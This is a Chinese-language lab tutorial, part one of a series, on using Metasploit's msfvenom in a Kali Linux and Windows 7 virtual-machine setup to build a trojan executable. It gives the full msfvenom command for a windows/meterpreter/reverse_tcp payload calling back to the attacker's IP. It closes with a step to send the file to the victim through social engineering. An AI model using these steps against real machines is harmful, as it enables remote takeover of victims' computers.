黑客是这样通过木马控制你的计算机（上）

一、背景介绍

Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用木马控制受害者主机呢？

二、资源装备

1.安装好 Win7的虚拟机一台

2.整装待发的小白一个。

3.安装好的Kali Linux虚拟机一台。

三、攻防实战

3.1 将受害者主机（Windows7）跟攻击者主机（Kali Linux）的网络模式全部设置为NAT模式，如下图所示。

步骤：打开虚拟机的设置/选择网络适配器/选择NAT模式。

3.2 利用攻击者主机（kali linux）的相关工具（msfvenom）生成对应的木马文件，如下图所示。

步骤1：msfvenom工具的参数介绍

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-o, –out < path> 指定创建好的payload的存放位置。

-h, –help 查看帮助选项。

步骤2：msfvenom工具生成对应的木马文件举例，如下图所示。

步骤3：查看攻击者主机的主机IP地址，如下图所示。

命令：ifconfig

 

步骤4：利用msfvenom工具生成对应的木马文件，如下图所示。

命令：msfvenom -p 指定需要使用的payload(攻击荷载) lhost=攻击者主机IP -f exe -o 生成木马文件的保存位置

例子：msfVenom -p windows/meterpreter/reverse_tcp lhost=192.168.78.144 -f exe -o /root/hk.exe

 

 步骤5：msfvenom工具生成木马文件对应的命令运行结果如下图所示。

Saved as:生成的木马文件保存路径。

 步骤6：在已知的木马文件保存路径目录下查找对应的木马文件是否已经生成，如下图所示，木马文件已经存在（这里使用图形化文件管理系统来查看，你也可以利用ls命令查看对应路径下面是否已经生成对应的木马文件）。

 3.3 利用一定的社会工程学方法将生成的木马文件发送到目标受害者主机，并且在受害者主机进行运行